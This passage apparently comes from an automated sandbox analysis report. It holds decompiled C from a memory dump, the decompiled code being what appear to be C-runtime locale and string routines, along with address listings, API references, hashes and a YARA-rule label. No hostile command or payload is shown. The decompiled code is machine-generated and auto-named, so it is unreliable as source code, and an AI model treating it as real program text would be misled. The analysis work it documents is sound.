														_t97 = E00EA3695(_v20 + 1 + _t149 - _a4, __eflags, _t149,  ~_v5 & _v20 + 0x00000001 + _t149 - _a4);
														__eflags = _t97;
														if(_t97 == 0) {
															_t98 = E00E95BBD();
															_t111 = _t110 | 0xffffffff;
															__eflags = _t111;
															 *_t98 = 0x2a;
														}
														goto L37;
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L9:
									__eflags = _v5 - _t110;
									if(_v5 != _t110) {
										 *0xeaa510 = E00E998AF(1, 4);
										E00E964B8(_t110);
										_t158 = _t158 + 0xc;
										__eflags =  *0xeaa510 - _t110; // 0xfcf210
										if(__eflags == 0) {
											L39:
											_t111 = _t110 | 0xffffffff;
											__eflags = _t111;
											goto L40;
										} else {
											__eflags =  *0xeaa514 - _t110; // 0x0
											if(__eflags != 0) {
												goto L14;
											} else {
												 *0xeaa514 = E00E998AF(1, 4);
												E00E964B8(_t110);
												_t158 = _t158 + 0xc;
												__eflags =  *0xeaa514 - _t110; // 0x0
												if(__eflags == 0) {
													goto L39;
												} else {
													goto L14;
												}
											}
										}
									} else {
										_t111 = 0;
										L40:
										E00E964B8(_t141);
										_t62 = _t111;
										goto L41;
									}
								} else {
									__eflags =  *0xeaa514 - _t110; // 0x0
									if(__eflags == 0) {
										goto L9;
									} else {
										_t108 = L00E9369A();
										__eflags = _t108;
										if(_t108 == 0) {
											goto L38;
										} else {
											L60();
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					_t109 = E00E95BBD();
					 *_t109 = 0x16;
					_t62 = _t109 | 0xffffffff;
					L41:
					return _t62;
				}
				L63:
			}

0x00e9aadf
0x00e9aae2
0x00e9aae4
0x00e9aae8
0x00e9aaed
0x00e9ab02
0x00e9ab07
0x00e9ab09
0x00e9ab0e
0x00e9ab13
0x00e9ab15
0x00e9acf6
0x00e9acfb
0x00000000
0x00e9ab1b
0x00e9ab1b
0x00e9ab1d
0x00000000
0x00e9ab23
0x00e9ab26
0x00e9ab29
0x00e9ab2e
0x00e9ab30
0x00e9ab36
0x00e9abb3
0x00e9abb3
0x00e9abb8
0x00e9abbb
0x00e9abbd
0x00000000
0x00e9abc3
0x00e9abca
0x00e9abcf
0x00e9abd4
0x00e9abd7
0x00e9abd9
0x00e9ac2a
0x00e9ac2a
0x00e9ac2d
0x00000000
0x00e9ac33
0x00e9ac33
0x00e9ac35
0x00e9ac38
0x00e9ac38
0x00e9ac3b
0x00e9ac3d
0x00000000
0x00e9ac43
0x00e9ac43
0x00e9ac49
0x00000000
0x00e9ac4f
0x00e9ac59
0x00e9ac5c
0x00e9ac61
0x00e9ac64
0x00e9ac67
0x00e9ac69
0x00000000
0x00e9ac6f
0x00e9ac6f
0x00e9ac72
0x00e9ac74
0x00e9ac77
0x00000000
0x00e9ac77
0x00e9ac69
0x00e9ac49
0x00e9ac3d
0x00e9abdb
0x00e9abdb
0x00e9abdd
0x00000000
0x00e9abdf
0x00e9abe2
0x00e9abe8
0x00e9abeb
0x00e9abee
0x00e9ac23
0x00e9ac25
0x00e9abf0
0x00e9abf0
0x00e9abfd
0x00e9abfd
0x00e9ac00
0x00000000
0x00000000
0x00e9abf9
0x00e9abfc
0x00e9abfc
0x00e9abfc
0x00e9ac0c
0x00e9ac0f
0x00e9ac14
0x00e9ac17
0x00e9ac1a
0x00e9ac1c
0x00e9ac7b
0x00e9ac7b
0x00e9ac7b
0x00e9ac1c
0x00e9ac80
0x00e9ac83
0x00000000
0x00e9ac85
0x00e9ac85
0x00e9ac88
0x00e9ac88
0x00e9ac8a
0x00e9ac8b
0x00e9ac8b
0x00e9ac97
0x00e9ac9f
0x00e9aca2
0x00e9aca3
0x00e9aca5
0x00e9aced
0x00e9acee
0x00000000
0x00e9aca7
0x00e9acae
0x00e9acb3
0x00e9acb6
0x00e9acb8
0x00e9ad14
0x00e9ad15
0x00e9ad16
0x00e9ad17
0x00e9ad18
0x00e9ad19
0x00e9ad1e
0x00e9ad21
0x00e9ad25
0x00e9ad26
0x00e9ad29
0x00e9ad2b
0x00e9ad34
0x00e9ad36
0x00e9ad38
0x00e9ad3a
0x00e9ad3c
0x00e9ad3c
0x00e9ad3f
0x00e9ad40
0x00e9ad40
0x00e9ad3c
0x00e9ad46
0x00e9ad51
0x00e9ad54
0x00e9ad55
0x00e9ad57
0x00e9adbf
0x00e9adbf
0x00000000
0x00e9ad59
0x00e9ad59
0x00e9ad5b
0x00e9ad5d
0x00e9adaf
0x00e9adb1
0x00e9adb7
0x00000000
0x00e9ad5f
0x00e9ad5f
0x00e9ad62
0x00e9ad62
0x00e9ad64
0x00e9ad64
0x00e9ad64
0x00e9ad67
0x00e9ad67
0x00e9ad69
0x00e9ad6a
0x00e9ad6a
0x00e9ad72
0x00e9ad76
0x00e9ad80
0x00e9ad83
0x00e9ad88
0x00e9ad8b
0x00e9ad8f
0x00000000
0x00e9ad91
0x00e9ad99
0x00e9ad9e
0x00e9ada1
0x00e9ada3
0x00e9adc4
0x00e9adc6
0x00e9adc7
0x00e9adc8
0x00e9adc9
0x00e9adca
0x00e9adcb
0x00e9add0
0x00e9add1
0x00e9add6
0x00e9addc
0x00e9adde
0x00e9addf
0x00e9ade5
0x00000000
0x00e9ade5
0x00e9adea
0x00000000
0x00000000
0x00000000
0x00e9ada3
0x00000000
0x00e9ada5
0x00e9ada5
0x00e9ada8
0x00e9adaa
0x00e9adaa
0x00000000
0x00e9adae
0x00e9ad5d
0x00e9ad2d
0x00e9ad2d
0x00e9ad2d
0x00e9ad2f
0x00e9ad33
0x00e9ad33
0x00e9acba
0x00e9accb
0x00e9accf
0x00e9acd4
0x00e9acdb
0x00e9acdd
0x00e9acdf
0x00e9ace4
0x00e9ace4
0x00e9ace7
0x00e9ace7
0x00000000
0x00e9acdd
0x00e9acb8
0x00e9aca5
0x00e9ac83
0x00e9abdd
0x00e9abd9
0x00e9ab38
0x00e9ab38
0x00e9ab3b
0x00e9ab59
0x00e9ab59
0x00e9ab5c
0x00e9ab6f
0x00e9ab74
0x00e9ab79
0x00e9ab7c
0x00e9ab82
0x00e9ad01
0x00e9ad01
0x00e9ad01
0x00000000
0x00e9ab88
0x00e9ab88
0x00e9ab8e
0x00000000
0x00e9ab90
0x00e9ab9a
0x00e9ab9f
0x00e9aba4
0x00e9aba7
0x00e9abad
0x00000000
0x00000000
0x00000000
0x00000000
0x00e9abad
0x00e9ab8e
0x00e9ab5e
0x00e9ab5e
0x00e9ad04
0x00e9ad05
0x00e9ad0c
0x00000000
0x00e9ad0e
0x00e9ab3d
0x00e9ab3d
0x00e9ab43
0x00000000
0x00e9ab45
0x00e9ab45
0x00e9ab4a
0x00e9ab4c
0x00000000
0x00e9ab52
0x00e9ab52
0x00000000
0x00e9ab52
0x00e9ab4c
0x00e9ab43
0x00e9ab3b
0x00e9ab36
0x00e9ab1d
0x00e9aaef
0x00e9aaef
0x00e9aaf4
0x00e9aafa
0x00e9ad0f
0x00e9ad13
0x00e9ad13
0x00000000

APIs

___from_strstr_to_strchr.LIBCMT ref: 00E9AB09
_free.LIBCMT ref: 00E9ABE2
_free.LIBCMT ref: 00E9AC0F

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 00547ed855ae1ce2a0b26e6b5187f5a4d6585d5b43e4caf4bd276cd3411598dd
Instruction ID: 428256ef6c368e2a750439514c0f1229e41fd1feca521a7f8e5c28d33f8c5644
Opcode Fuzzy Hash: 00547ed855ae1ce2a0b26e6b5187f5a4d6585d5b43e4caf4bd276cd3411598dd
Instruction Fuzzy Hash: 9551C5B1904315AFDF20AFB8D841AAD77E5EF06318F18657AE910BB281E7359A40C7D3

Uniqueness

Uniqueness Score: -1.00%

Function 00E942A7, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00E942A7(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v60;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				short _v454;
				intOrPtr _v456;
				signed int _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v512;
				char _v536;
				intOrPtr _v540;
				signed int _v544;
				intOrPtr _v548;
				signed int _v560;
				char _v708;
				signed int _v712;
				short _v714;
				signed int* _v716;
				signed int _v720;
				signed int _v724;
				signed int _v728;
				signed int* _v732;
				intOrPtr _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v824;
				char _v1252;
				char _v1264;
				intOrPtr _v1276;
				signed int _v1288;
				signed int _t240;
				void* _t243;
				signed int _t246;
				signed int _t248;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t260;
				signed int _t262;
				void* _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t269;
				signed int _t272;
				signed int _t279;
				signed int _t282;
				signed int _t283;
				intOrPtr _t284;
				signed int _t287;
				signed int _t289;
				signed int _t290;
				intOrPtr _t292;
				signed int _t295;
				signed int _t296;
				signed int _t298;
				signed int _t318;
				signed int _t320;
				signed int _t322;
				signed int _t327;
				void* _t329;
				signed int _t331;
				void* _t332;
				intOrPtr _t333;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t344;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				intOrPtr* _t363;
				signed int _t365;
				intOrPtr* _t375;
				intOrPtr* _t378;
				void* _t381;
				signed int _t382;
				intOrPtr* _t385;
				intOrPtr* _t386;
				signed int _t395;
				intOrPtr _t398;
				intOrPtr* _t399;
				signed int _t401;
				signed int* _t405;
				signed int _t406;
				intOrPtr* _t412;
				intOrPtr* _t413;
				signed int _t421;
				signed int _t422;
				short _t423;
				void* _t424;
				void* _t426;
				signed int _t427;
				signed int _t429;
				intOrPtr _t430;
				signed int _t433;
				intOrPtr _t434;
				signed int _t436;
				signed int _t439;
				intOrPtr _t445;
				signed int _t446;
				signed int _t448;
				signed int _t449;
				signed int _t453;
				signed int _t455;
				signed int _t458;
				signed int* _t459;
				intOrPtr* _t460;
				short _t461;
				void* _t463;
				signed int _t465;
				signed int _t467;
				void* _t469;
				void* _t470;
				void* _t472;
				signed int _t473;
				void* _t474;
				void* _t476;
				signed int _t477;
				void* _t479;
				void* _t481;
				signed int _t493;

				_t421 = __edx;
				_t463 = _t469;
				_t470 = _t469 - 0x10;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t358 = E00E96F1C(0x6a6);
				_t239 = 0;
				if(_t358 == 0) {
					L20:
					return _t239;
				} else {
					_push(__edi);
					_t2 = _t358 + 4; // 0x4
					_t429 = _t2;
					 *_t429 = 0;
					 *_t358 = 1;
					_t445 = _a4;
					_t240 = _t445 + 0x30;
					_push( *_t240);
					_v16 = _t240;
					_push(0xe74e28);
					_push( *E00E74D64);
					E00E941E1(_t358, _t429, _t445, _t429, 0x351, 3);
					_t472 = _t470 + 0x18;
					_v8 = E00E74D64;
					while(1) {
						L2:
						_t243 = E00E99764(_t429, 0x351, 0xe74e24);
						_t473 = _t472 + 0xc;
						if(_t243 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t412 = _t8;
							_t338 =  *_v16;
							_v16 = _t412;
							_t413 =  *_t412;
							_v20 = _t413;
							goto L4;
						}
						while(1) {
							L4:
							_t421 =  *_t338;
							if(_t421 !=  *_t413) {
								break;
							}
							if(_t421 == 0) {
								L8:
								_t339 = 0;
							} else {
								_t421 =  *((intOrPtr*)(_t338 + 2));
								if(_t421 !=  *((intOrPtr*)(_t413 + 2))) {
									break;
								} else {
									_t338 = _t338 + 4;
									_t413 = _t413 + 4;
									if(_t421 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							_push(_v20);
							_push(0xe74e28);
							asm("sbb eax, eax");
							_v12 = _v12 &  !( ~_t339);
							_t344 = _v8 + 0xc;
							_v8 = _t344;
							_push( *_t344);
							E00E941E1(_t358, _t429, _t445, _t429, 0x351, 3);
							_t472 = _t473 + 0x18;
							if(_v8 < 0xe74d94) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E00E964B8(_t358);
									_t436 = _t429 | 0xffffffff;
									__eflags =  *(_t445 + 0x28);
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											E00E964B8( *(_t445 + 0x28));
										}
									}
									__eflags =  *(_t445 + 0x24);
									if( *(_t445 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t436 == 1;
										if(_t436 == 1) {
											E00E964B8( *(_t445 + 0x24));
										}
									}
									 *(_t445 + 0x24) = 0;
									 *(_t445 + 0x1c) = 0;
									 *(_t445 + 0x28) = 0;
									 *((intOrPtr*)(_t445 + 0x20)) = 0;
									_t239 =  *((intOrPtr*)(_t445 + 0x40));
								} else {
									_t439 = _t429 | 0xffffffff;
									_t493 =  *(_t445 + 0x28);
									if(_t493 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t493 == 0) {
											E00E964B8( *(_t445 + 0x28));
										}
									}
									if( *(_t445 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										if(_t439 == 1) {
											E00E964B8( *(_t445 + 0x24));
										}
									}
									 *(_t445 + 0x24) =  *(_t445 + 0x24) & 0x00000000;
									_t28 = _t358 + 4; // 0x4
									_t239 = _t28;
									 *(_t445 + 0x1c) =  *(_t445 + 0x1c) & 0x00000000;
									 *(_t445 + 0x28) = _t358;
									 *((intOrPtr*)(_t445 + 0x20)) = _t239;
								}
								goto L20;
							}
							goto L131;
						}
						asm("sbb eax, eax");
						_t339 = _t338 | 0x00000001;
						__eflags = _t339;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00E92919();
					asm("int3");
					_push(_t463);
					_t465 = _t473;
					_t474 = _t473 - 0x1d0;
					_t246 =  *0xea9014; // 0xa413846
					_v60 = _t246 ^ _t465;
					_t248 = _v44;
					_push(_t358);
					_push(_t445);
					_t446 = _v40;
					_push(_t429);
					_t430 = _v48;
					_v512 = _t430;
					__eflags = _t248;
					if(_t248 == 0) {
						_v460 = 1;
						_v468 = 0;
						_t360 = 0;
						_v452 = 0;
						__eflags = _t446;
						if(__eflags == 0) {
							L79:
							E00E942A7(_t360, _t421, _t430, _t446, __eflags, _t430);
							goto L80;
						} else {
							__eflags =  *_t446 - 0x4c;
							if( *_t446 != 0x4c) {
								L59:
								_t254 = E00E93E03(_t360, _t430, _t446, _t446,  &_v276, 0x83,  &_v448, 0x55, 0);
								_t476 = _t474 + 0x18;
								__eflags = _t254;
								if(_t254 != 0) {
									__eflags = 0;
									_t422 = _t430 + 0x20;
									_t448 = 0;
									_v452 = _t422;
									do {
										__eflags = _t448;
										if(_t448 == 0) {
											L74:
											_t255 = _v460;
										} else {
											_t375 =  *_t422;
											_t256 =  &_v276;
											while(1) {
												__eflags =  *_t256 -  *_t375;
												_t430 = _v464;
												if( *_t256 !=  *_t375) {
													break;
												}
												__eflags =  *_t256;
												if( *_t256 == 0) {
													L67:
													_t257 = 0;
												} else {
													_t423 =  *((intOrPtr*)(_t256 + 2));
													__eflags = _t423 -  *((intOrPtr*)(_t375 + 2));
													_v454 = _t423;
													_t422 = _v452;
													if(_t423 !=  *((intOrPtr*)(_t375 + 2))) {
														break;
													} else {
														_t256 = _t256 + 4;
														_t375 = _t375 + 4;
														__eflags = _v454;
														if(_v454 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t257;
												if(_t257 == 0) {
													_t360 = _t360 + 1;
													__eflags = _t360;
													goto L74;
												} else {
													_t258 =  &_v276;
													_push(_t258);
													_push(_t448);
													_push(_t430);
													L83();
													_t422 = _v452;
													_t476 = _t476 + 0xc;
													__eflags = _t258;
													if(_t258 == 0) {
														_t255 = 0;
														_v460 = 0;
													} else {
														_t360 = _t360 + 1;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t257 = _t256 | 0x00000001;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t448 = _t448 + 1;
										_t422 = _t422 + 0x10;
										_v452 = _t422;
										__eflags = _t448 - 5;
									} while (_t448 <= 5);
									__eflags = _t255;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t360;
										if(__eflags != 0) {
											goto L79;
										} else {
										}
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t446 + 2) - 0x43;
								if( *(_t446 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t446 + 4)) - 0x5f;
									if( *((short*)(_t446 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t260 = E00E9BE10(_t446, 0xe74e1c);
											_t362 = _t260;
											_v472 = _t362;
											_pop(_t377);
											__eflags = _t362;
											if(_t362 == 0) {
												break;
											}
											_t262 = _t260 - _t446;
											__eflags = _t262;
											_v460 = _t262 >> 1;
											if(_t262 == 0) {
												break;
											} else {
												_t264 = 0x3b;
												__eflags =  *_t362 - _t264;
												if( *_t362 == _t264) {
													break;
												} else {
													_t433 = _v460;
													_t363 = E00E74D64;
													_v456 = 1;
													do {
														_t265 = E00E963DD( *_t363, _t446, _t433);
														_t474 = _t474 + 0xc;
														__eflags = _t265;
														if(_t265 != 0) {
															goto L45;
														} else {
															_t378 =  *_t363;
															_t424 = _t378 + 2;
															do {
																_t333 =  *_t378;
																_t378 = _t378 + 2;
																__eflags = _t333 - _v468;
															} while (_t333 != _v468);
															_t377 = _t378 - _t424 >> 1;
															__eflags = _t433 - _t378 - _t424 >> 1;
															if(_t433 != _t378 - _t424 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v456 = _v456 + 1;
														_t363 = _t363 + 0xc;
														__eflags = _t363 - 0xe74d94;
													} while (_t363 <= 0xe74d94);
													_t360 = _v472 + 2;
													_t266 = E00E9BDB5(_t377, _t360, 0xe74e24);
													_t430 = _v464;
													_t449 = _t266;
													_pop(_t381);
													__eflags = _t449;
													if(_t449 != 0) {
														L48:
														__eflags = _v456 - 5;
														if(_v456 > 5) {
															_t382 = _v452;
															goto L54;
														} else {
															_push(_t449);
															_t269 = E00E998A4( &_v276, 0x83, _t360);
															_t477 = _t474 + 0x10;
															__eflags = _t269;
															if(_t269 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E00E92919();
																asm("int3");
																_push(_t465);
																_t467 = _t477;
																_t272 =  *0xea9014; // 0xa413846
																_v560 = _t272 ^ _t467;
																_push(_t360);
																_t365 = _v544;
																_push(_t449);
																_push(_t430);
																_t434 = _v548;
																_v1288 = _t365;
																_v1276 = E00E9830D(_t381, _t421) + 0x278;
																_t279 = E00E93E03(_t365, _t434, _v540, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1264);
																_t479 = _t477 - 0x2e4 + 0x18;
																__eflags = _t279;
																if(_t279 == 0) {
																	L122:
																	__eflags = 0;
																	goto L123;
																} else {
																	_t102 = _t365 + 2; // 0x6
																	_t453 = _t102 << 4;
																	__eflags = _t453;
																	_t282 =  &_v280;
																	_v724 = _t453;
																	_t385 =  *((intOrPtr*)(_t453 + _t434));
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t282 -  *_t385;
																		_t455 = _v724;
																		if( *_t282 !=  *_t385) {
																			break;
																		}
																		__eflags =  *_t282;
																		if( *_t282 == 0) {
																			L89:
																			_t283 = _v712;
																		} else {
																			_t461 =  *((intOrPtr*)(_t282 + 2));
																			__eflags = _t461 -  *((intOrPtr*)(_t385 + 2));
																			_v714 = _t461;
																			_t455 = _v724;
																			if(_t461 !=  *((intOrPtr*)(_t385 + 2))) {
																				break;
																			} else {
																				_t282 = _t282 + 4;
																				_t385 = _t385 + 4;
																				__eflags = _v714;
																				if(_v714 != 0) {
																					continue;
																				} else {
																					goto L89;
																				}
																			}
																		}
																		L91:
																		__eflags = _t283;
																		if(_t283 != 0) {
																			_t386 =  &_v280;
																			_t426 = _t386 + 2;
																			do {
																				_t284 =  *_t386;
																				_t386 = _t386 + 2;
																				__eflags = _t284 - _v712;
																			} while (_t284 != _v712);
																			_v728 = (_t386 - _t426 >> 1) + 1;
																			_t287 = E00E96F1C(4 + ((_t386 - _t426 >> 1) + 1) * 2);
																			_v740 = _t287;
																			__eflags = _t287;
																			if(_t287 == 0) {
																				goto L122;
																			} else {
																				_v736 =  *((intOrPtr*)(_t455 + _t434));
																				_v748 =  *(_t434 + 0xa0 + _t365 * 4);
																				_v752 =  *(_t434 + 8);
																				_v716 = _t287 + 4;
																				_t289 = E00E9604D(_t287 + 4, _v728,  &_v280);
																				_t481 = _t479 + 0xc;
																				__eflags = _t289;
																				if(_t289 != 0) {
																					_t290 = _v712;
																					_push(_t290);
																					_push(_t290);
																					_push(_t290);
																					_push(_t290);
																					_push(_t290);
																					E00E92919();
																					asm("int3");
																					_t292 =  *0xeaa53c; // 0x0
																					return _t292;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t455 + _t434)) = _v716;
																					if(_v280 != 0x43) {
																						L100:
																						_t295 = E00E93B10(_t365, _t434,  &_v708);
																						_t395 = _v712;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L100;
																						} else {
																							_t395 = _v712;
																							_t295 = _t395;
																						}
																					}
																					 *(_t434 + 0xa0 + _t365 * 4) = _t295;
																					__eflags = _t365 - 2;
																					if(_t365 != 2) {
																						__eflags = _t365 - 1;
																						if(_t365 != 1) {
																							__eflags = _t365 - 5;
																							if(_t365 == 5) {
																								 *((intOrPtr*)(_t434 + 0x14)) = _v720;
																							}
																						} else {
																							 *((intOrPtr*)(_t434 + 0x10)) = _v720;
																						}
																					} else {
																						_t459 = _v732;
																						_t427 = _t395;
																						_t405 = _t459;
																						 *(_t434 + 8) = _v720;
																						_v716 = _t459;
																						_v728 = _t459[8];
																						_v720 = _t459[9];
																						while(1) {
																							__eflags =  *(_t434 + 8) -  *_t405;
																							if( *(_t434 + 8) ==  *_t405) {
																								break;
																							}
																							_t460 = _v716;
																							_t427 = _t427 + 1;
																							_t327 =  *_t405;
																							 *_t460 = _v728;
																							_v720 = _t405[1];
																							_t405 = _t460 + 8;
																							 *((intOrPtr*)(_t460 + 4)) = _v720;
																							_t365 = _v744;
																							_t459 = _v732;
																							_v728 = _t327;
																							_v716 = _t405;
																							__eflags = _t427 - 5;
																							if(_t427 < 5) {
																								continue;
																							} else {
																							}
																							L108:
																							__eflags = _t427 - 5;
																							if(__eflags == 0) {
																								_t318 = E00E9BFC9(_t365, _t434, _t459, __eflags, _v712, 1, 0xe74cd8, 0x7f,  &_v536,  *(_t434 + 8), 1);
																								_t481 = _t481 + 0x1c;
																								__eflags = _t318;
																								if(_t318 == 0) {
																									_t406 = _v712;
																								} else {
																									_t320 = _v712;
																									do {
																										 *(_t467 + _t320 * 2 - 0x20c) =  *(_t467 + _t320 * 2 - 0x20c) & 0x000001ff;
																										_t320 = _t320 + 1;
																										__eflags = _t320 - 0x7f;
																									} while (_t320 < 0x7f);
																									_t322 = L00E8E36D( &_v536,  *0xea90a0, 0xfe);
																									_t481 = _t481 + 0xc;
																									__eflags = _t322;
																									_t406 = 0 | _t322 == 0x00000000;
																								}
																								_t459[1] = _t406;
																								 *_t459 =  *(_t434 + 8);
																							}
																							 *(_t434 + 0x18) = _t459[1];
																							goto L120;
																						}
																						__eflags = _t427;
																						if(_t427 != 0) {
																							 *_t459 =  *(_t459 + _t427 * 8);
																							_t459[1] =  *(_t459 + 4 + _t427 * 8);
																							 *(_t459 + _t427 * 8) = _v728;
																							 *(_t459 + 4 + _t427 * 8) = _v720;
																						}
																						goto L108;
																					}
																					L120:
																					_t296 = _t365 * 0xc;
																					_t198 = _t296 + 0xe74d60; // 0xe869c7
																					 *0xea72b4(_t434);
																					_t298 =  *((intOrPtr*)( *_t198))();
																					_t398 = _v736;
																					__eflags = _t298;
																					if(_t298 == 0) {
																						__eflags = _t398 - 0xea93d8;
																						if(_t398 != 0xea93d8) {
																							_t458 = _t365 + _t365;
																							__eflags = _t458;
																							asm("lock xadd [eax], ecx");
																							if(_t458 != 0) {
																								goto L127;
																							} else {
																								E00E964B8( *((intOrPtr*)(_t434 + 0x28 + _t458 * 8)));
																								E00E964B8( *((intOrPtr*)(_t434 + 0x24 + _t458 * 8)));
																								E00E964B8( *(_t434 + 0xa0 + _t365 * 4));
																								_t401 = _v712;
																								 *(_v724 + _t434) = _t401;
																								 *(_t434 + 0xa0 + _t365 * 4) = _t401;
																							}
																						}
																						_t399 = _v740;
																						 *_t399 = 1;
																						 *((intOrPtr*)(_t434 + 0x28 + (_t365 + _t365) * 8)) = _t399;
																					} else {
																						 *((intOrPtr*)(_v724 + _t434)) = _t398;
																						E00E964B8( *(_t434 + 0xa0 + _t365 * 4));
																						 *(_t434 + 0xa0 + _t365 * 4) = _v748;
																						E00E964B8(_v740);
																						 *(_t434 + 8) = _v752;
																						goto L122;
																					}
																					goto L123;
																				}
																			}
																		} else {
																			L123:
																			__eflags = _v16 ^ _t467;
																			return E00E8AE43(_v16 ^ _t467);
																		}
																		goto L131;
																	}
																	asm("sbb eax, eax");
																	_t283 = _t282 | 0x00000001;
																	__eflags = _t283;
																	goto L91;
																}
															} else {
																_t329 = _t449 + _t449;
																__eflags = _t329 - 0x106;
																if(_t329 >= 0x106) {
																	E00E8AF7A();
																	goto L82;
																} else {
																	 *((short*)(_t465 + _t329 - 0x10c)) = 0;
																	_t331 =  &_v276;
																	_push(_t331);
																	_push(_v456);
																	_push(_t430);
																	L83();
																	_t382 = _v452;
																	_t474 = _t477 + 0xc;
																	__eflags = _t331;
																	if(_t331 != 0) {
																		_t382 = _t382 + 1;
																		_v452 = _t382;
																	}
																	L54:
																	_t446 = _t360 + _t449 * 2;
																	_t267 =  *_t446 & 0x0000ffff;
																	_t421 = _t267;
																	__eflags = _t267;
																	if(_t267 != 0) {
																		_t446 = _t446 + 2;
																		__eflags = _t446;
																		_t421 =  *_t446 & 0x0000ffff;
																	}
																	__eflags = _t421;
																	if(_t421 != 0) {
																		continue;
																	} else {
																		__eflags = _t382;
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																			break;
																		}
																		goto L80;
																	}
																}
															}
														}
													} else {
														_t332 = 0x3b;
														__eflags =  *_t360 - _t332;
														if( *_t360 != _t332) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L131;
										}
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t446;
						if(_t446 != 0) {
							_push(_t446);
							_push(_t248);
							_push(_t430);
							L83();
						}
						L80:
						__eflags = _v12 ^ _t465;
						return E00E8AE43(_v12 ^ _t465);
					}
				}
				L131:
			}

0x00e942a7
0x00e942aa
0x00e942ac
0x00e942af
0x00e942b0
0x00e942b9
0x00e942c1
0x00e942c3
0x00e942c8
0x00e943e5
0x00e943ea
0x00e942ce
0x00e942ce
0x00e942cf
0x00e942cf
0x00e942d2
0x00e942d5
0x00e942d7
0x00e942da
0x00e942dd
0x00e942df
0x00e942e2
0x00e942e7
0x00e942f5
0x00e942ff
0x00e94302
0x00e94305
0x00e94305
0x00e94310
0x00e94315
0x00e9431a
0x00000000
0x00e94320
0x00e94323
0x00e94323
0x00e94326
0x00e94328
0x00e9432b
0x00e9432d
0x00e9432d
0x00e9432d
0x00e94330
0x00e94330
0x00e94330
0x00e94336
0x00000000
0x00000000
0x00e9433b
0x00e94352
0x00e94352
0x00e9433d
0x00e9433d
0x00e94345
0x00000000
0x00e94347
0x00e94347
0x00e9434a
0x00e94350
0x00000000
0x00000000
0x00000000
0x00000000
0x00e94350
0x00e94345
0x00e9435b
0x00e9435b
0x00e94360
0x00e94365
0x00e94369
0x00e94375
0x00e94378
0x00e9437b
0x00e94385
0x00e9438d
0x00e94395
0x00000000
0x00e9439b
0x00e9439f
0x00e943ec
0x00e943f5
0x00e943f8
0x00e943fa
0x00e943fe
0x00e94402
0x00e94407
0x00e9440c
0x00e94402
0x00e94410
0x00e94412
0x00e94414
0x00e94418
0x00e94419
0x00e9441e
0x00e94423
0x00e94419
0x00e94426
0x00e94429
0x00e9442c
0x00e9442f
0x00e94432
0x00e943a1
0x00e943a4
0x00e943a7
0x00e943a9
0x00e943ad
0x00e943b1
0x00e943b6
0x00e943bb
0x00e943b1
0x00e943c1
0x00e943c3
0x00e943c8
0x00e943cd
0x00e943d2
0x00e943c8
0x00e943d3
0x00e943d7
0x00e943d7
0x00e943da
0x00e943de
0x00e943e1
0x00e943e1
0x00000000
0x00e943e4
0x00000000
0x00e94395
0x00e94356
0x00e94358
0x00e94358
0x00000000
0x00e94358
0x00e94439
0x00e9443a
0x00e9443b
0x00e9443c
0x00e9443d
0x00e9443e
0x00e94443
0x00e94446
0x00e94447
0x00e94449
0x00e9444f
0x00e94456
0x00e94459
0x00e9445c
0x00e9445d
0x00e9445e
0x00e94461
0x00e94462
0x00e94465
0x00e9446b
0x00e9446d
0x00e94492
0x00e9449c
0x00e944a2
0x00e944a4
0x00e944aa
0x00e944ac
0x00e94706
